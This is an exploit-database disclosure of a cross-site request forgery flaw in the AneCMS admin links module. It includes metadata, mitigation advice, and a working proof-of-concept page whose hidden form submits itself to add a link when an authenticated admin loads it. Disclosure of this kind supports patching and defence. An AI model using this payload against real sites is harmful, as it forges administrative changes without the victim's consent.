AneCMS CSRF Vulnerability

vendor:

Ane_CMS

by:

Pratul Agrawal

5.5

CVSS

MEDIUM

CSRF

CWE

Product Name: Ane_CMS

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: PHP

This vulnerability allows an attacker to add a new link through Cross-Site Request Forgery (CSRF) on the Admin module of AneCMS. By exploiting this vulnerability, an attacker can submit a form with hidden fields containing malicious data, which will be executed when the form is submitted by an authenticated user.

Mitigation:

To mitigate this vulnerability, implement proper CSRF protection mechanisms such as using CSRF tokens and checking the referrer header.

Source

Exploit-DB raw data:

                                =======================================================================
   
                                                    AneCMS CSRF Vulnerability
 
                                =======================================================================
   
                                                               by
   
                                                         Pratul Agrawal
 
   
   
  # Vulnerability found in- Admin module
   
  # email         Pratulag@yahoo.com
   
  # company       aksitservices
   
  # Credit by     Pratul Agrawal
 
  # Software      Ane_CMS

  # Category  	  CMS / Portals
  
  # Plateform     php
  
   
   
  #  Proof of concept   #
 
  Targeted URL:  http://server/acp/index.php?p=cfg&m=links
  
 
   Script to Add a new link through Cross Site request forgery
   
             .  ................................................................................................................
   
                        <html>

                          <body>

                             <form name="XYZ" action="http://server/acp/index.php?p=cfg&m=links&id=0" method="post">

                                    <input type=hidden name="name" value="master">

                                    <input type=hidden name="link" value="master.asp">

                                    <input type=hidden name="type" value="1">
              
                                    <input type=hidden name="view" value="0">

                             </form>

                               <script>

                                 document.XYZ.submit();

                               </script>

                          </body>

                        </html>
   
             .  ..................................................................................................................
   
   
   
  After execution refresh the page and u can see that a new link with teh given name is Added automatically.
  
  
  #If you have any questions, comments, or concerns, feel free to contact me.